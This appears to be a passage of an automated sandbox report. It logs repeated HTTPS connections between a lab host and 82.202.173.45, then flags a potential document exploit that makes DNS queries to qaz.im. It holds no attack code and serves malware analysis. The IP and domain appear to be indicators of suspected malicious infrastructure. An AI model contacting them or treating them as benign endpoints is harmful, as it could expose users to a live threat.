Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49173
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49174
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49174
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49174
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49174
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49174
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49174
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49174
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49174
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49175 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49175
Source: global traffic	TCP traffic: 192.168.2.22:49175 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49175 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49175
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49175
Source: global traffic	TCP traffic: 192.168.2.22:49175 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49175 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49175
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49175
Source: global traffic	TCP traffic: 192.168.2.22:49175 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49175
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49175
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49175
Source: global traffic	TCP traffic: 192.168.2.22:49175 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49175 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49175
Source: global traffic	TCP traffic: 192.168.2.22:49175 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49175
Source: global traffic	TCP traffic: 192.168.2.22:49176 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49176
Source: global traffic	TCP traffic: 192.168.2.22:49176 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49176 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49176
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49176
Source: global traffic	TCP traffic: 192.168.2.22:49176 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49176
Source: global traffic	TCP traffic: 192.168.2.22:49176 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49176
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49176
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49176
Source: global traffic	TCP traffic: 192.168.2.22:49176 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49176
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49176
Source: global traffic	TCP traffic: 192.168.2.22:49176 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49176 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49176
Source: global traffic	TCP traffic: 192.168.2.22:49176 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49176
Source: global traffic	TCP traffic: 192.168.2.22:49177 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49177
Source: global traffic	TCP traffic: 192.168.2.22:49177 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49177 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49177
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49177
Source: global traffic	TCP traffic: 192.168.2.22:49177 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49177
Source: global traffic	TCP traffic: 192.168.2.22:49177 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49177
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49177
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49177
Source: global traffic	TCP traffic: 192.168.2.22:49177 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49177 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49177
Source: global traffic	TCP traffic: 192.168.2.22:49177 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49177
Source: global traffic	TCP traffic: 192.168.2.22:49177 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49177
Source: global traffic	TCP traffic: 192.168.2.22:49178 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49178
Source: global traffic	TCP traffic: 192.168.2.22:49178 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49178 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49178
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49178
Source: global traffic	TCP traffic: 192.168.2.22:49178 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49178
Source: global traffic	TCP traffic: 192.168.2.22:49178 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49178
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49178
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49178
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49178
Source: global traffic	TCP traffic: 192.168.2.22:49178 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49178 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49178 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49178
Source: global traffic	TCP traffic: 192.168.2.22:49178 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49178
Source: global traffic	TCP traffic: 192.168.2.22:49179 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49179
Source: global traffic	TCP traffic: 192.168.2.22:49179 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49179 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49179
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49179
Source: global traffic	TCP traffic: 192.168.2.22:49179 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49179
Source: global traffic	TCP traffic: 192.168.2.22:49179 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49179
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49179
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49179
Source: global traffic	TCP traffic: 192.168.2.22:49179 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49179 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49179
Source: global traffic	TCP traffic: 192.168.2.22:49179 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49179
Source: global traffic	TCP traffic: 192.168.2.22:49179 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49179
Source: global traffic	TCP traffic: 192.168.2.22:49180 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49180
Source: global traffic	TCP traffic: 192.168.2.22:49180 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49180 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49180
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49180
Source: global traffic	TCP traffic: 192.168.2.22:49180 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49180
Source: global traffic	TCP traffic: 192.168.2.22:49180 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49180
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49180
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49180
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49180
Source: global traffic	TCP traffic: 192.168.2.22:49180 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49180 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49180
Source: global traffic	TCP traffic: 192.168.2.22:49180 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49180
Source: global traffic	TCP traffic: 192.168.2.22:49181 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49181
Source: global traffic	TCP traffic: 192.168.2.22:49181 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49181 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49181
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49181
Source: global traffic	TCP traffic: 192.168.2.22:49181 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49181 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49181
Source: global traffic	TCP traffic: 192.168.2.22:49181 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49181
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49181
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49181
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49181
Source: global traffic	TCP traffic: 192.168.2.22:49181 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49181
Source: global traffic	TCP traffic: 192.168.2.22:49181 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49181 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49181 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49181 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49181
Source: global traffic	TCP traffic: 192.168.2.22:49182 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49182
Source: global traffic	TCP traffic: 192.168.2.22:49182 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49182 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49182
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49182
Source: global traffic	TCP traffic: 192.168.2.22:49182 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49182 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49182
Source: global traffic	TCP traffic: 192.168.2.22:49182 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49182
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49182
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49182
Source: global traffic	TCP traffic: 192.168.2.22:49182 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49182 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49182 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49182
Source: global traffic	TCP traffic: 192.168.2.22:49182 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49182 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49183 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49183
Source: global traffic	TCP traffic: 192.168.2.22:49183 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49183 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49183
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49183
Source: global traffic	TCP traffic: 192.168.2.22:49183 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49183 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49183
Source: global traffic	TCP traffic: 192.168.2.22:49183 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49183
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49183
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49183
Source: global traffic	TCP traffic: 192.168.2.22:49183 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49183 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49183
Source: global traffic	TCP traffic: 192.168.2.22:49183 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49183 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49184 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49184
Source: global traffic	TCP traffic: 192.168.2.22:49184 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49184 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49184
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49184
Source: global traffic	TCP traffic: 192.168.2.22:49184 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49184 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49184
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49184
Source: global traffic	TCP traffic: 192.168.2.22:49184 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49184
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49184
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49184
Source: global traffic	TCP traffic: 192.168.2.22:49184 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49184 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49184
Source: global traffic	TCP traffic: 192.168.2.22:49185 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49185
Source: global traffic	TCP traffic: 192.168.2.22:49185 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49185 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49185
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49185
Source: global traffic	TCP traffic: 192.168.2.22:49185 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49185
Source: global traffic	TCP traffic: 192.168.2.22:49185 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49185
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49185
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49185
Source: global traffic	TCP traffic: 192.168.2.22:49185 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49185 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49185
Source: global traffic	TCP traffic: 192.168.2.22:49185 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49185
Source: global traffic	TCP traffic: 192.168.2.22:49186 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49186
Source: global traffic	TCP traffic: 192.168.2.22:49186 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49186 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49186
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49186
Source: global traffic	TCP traffic: 192.168.2.22:49186 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49186
Source: global traffic	TCP traffic: 192.168.2.22:49186 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49186
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49186
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49186
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49186
Source: global traffic	TCP traffic: 192.168.2.22:49186 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49186 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49186 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49186
Source: global traffic	TCP traffic: 192.168.2.22:49186 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49186
Source: global traffic	TCP traffic: 192.168.2.22:49187 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49187
Source: global traffic	TCP traffic: 192.168.2.22:49187 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49187 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49187
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49187
Source: global traffic	TCP traffic: 192.168.2.22:49187 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49187
Source: global traffic	TCP traffic: 192.168.2.22:49187 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49187
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49187
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49187
Source: global traffic	TCP traffic: 192.168.2.22:49187 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49187 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49187
Source: global traffic	TCP traffic: 192.168.2.22:49187 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49187
Source: global traffic	TCP traffic: 192.168.2.22:49188 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49188
Source: global traffic	TCP traffic: 192.168.2.22:49188 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49188 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49188
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49188
Source: global traffic	TCP traffic: 192.168.2.22:49188 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49188
Source: global traffic	TCP traffic: 192.168.2.22:49188 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49188
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49188
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49188
Source: global traffic	TCP traffic: 192.168.2.22:49188 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49188
Source: global traffic	TCP traffic: 192.168.2.22:49188 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49188 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49188
Source: global traffic	TCP traffic: 192.168.2.22:49188 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49188
Source: global traffic	TCP traffic: 192.168.2.22:49188 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49188
Source: global traffic	TCP traffic: 192.168.2.22:49189 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49189
Source: global traffic	TCP traffic: 192.168.2.22:49189 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49189 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49189
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49189
Source: global traffic	TCP traffic: 192.168.2.22:49189 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49189 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49189
Source: global traffic	TCP traffic: 192.168.2.22:49189 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49189
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49189
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49189
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49189
Source: global traffic	TCP traffic: 192.168.2.22:49189 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49189
Source: global traffic	TCP traffic: 192.168.2.22:49189 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49189
Source: global traffic	TCP traffic: 192.168.2.22:49189 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49189
Source: global traffic	TCP traffic: 192.168.2.22:49189 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49189 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49189 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49189
Source: global traffic	TCP traffic: 192.168.2.22:49190 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49190
Source: global traffic	TCP traffic: 192.168.2.22:49190 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49190 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49190
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49190
Source: global traffic	TCP traffic: 192.168.2.22:49190 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49190 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49190
Source: global traffic	TCP traffic: 192.168.2.22:49190 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49190
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49190
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49190
Source: global traffic	TCP traffic: 192.168.2.22:49190 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49190 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49190 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49190
Source: global traffic	TCP traffic: 192.168.2.22:49190 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49190 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49191 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49191
Source: global traffic	TCP traffic: 192.168.2.22:49191 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49191 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49191
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49191
Source: global traffic	TCP traffic: 192.168.2.22:49191 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49191 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49191
Source: global traffic	TCP traffic: 192.168.2.22:49191 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49191
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49191
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49191
Source: global traffic	TCP traffic: 192.168.2.22:49191 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49191
Source: global traffic	TCP traffic: 192.168.2.22:49191 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49191 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49191
Source: global traffic	TCP traffic: 192.168.2.22:49191 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49191
Source: global traffic	TCP traffic: 192.168.2.22:49191 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49191
Source: global traffic	TCP traffic: 192.168.2.22:49191 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49191
Source: global traffic	TCP traffic: 192.168.2.22:49191 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49191 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49191 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49191
Source: global traffic	TCP traffic: 192.168.2.22:49192 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49192
Source: global traffic	TCP traffic: 192.168.2.22:49192 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49192 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49192
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49192
Source: global traffic	TCP traffic: 192.168.2.22:49192 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49192 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49192
Source: global traffic	TCP traffic: 192.168.2.22:49192 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49192
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49192
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49192
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49192
Source: global traffic	TCP traffic: 192.168.2.22:49192 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49192 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49192
Source: global traffic	TCP traffic: 192.168.2.22:49192 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49192 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49192 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49192 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49192

Potential document exploit detected (performs DNS queries)

Source: global traffic	DNS query: name: qaz.im
Source: global traffic	DNS query: name: qaz.im
Source: global traffic	DNS query: name: qaz.im
Source: global traffic	DNS query: name: qaz.im
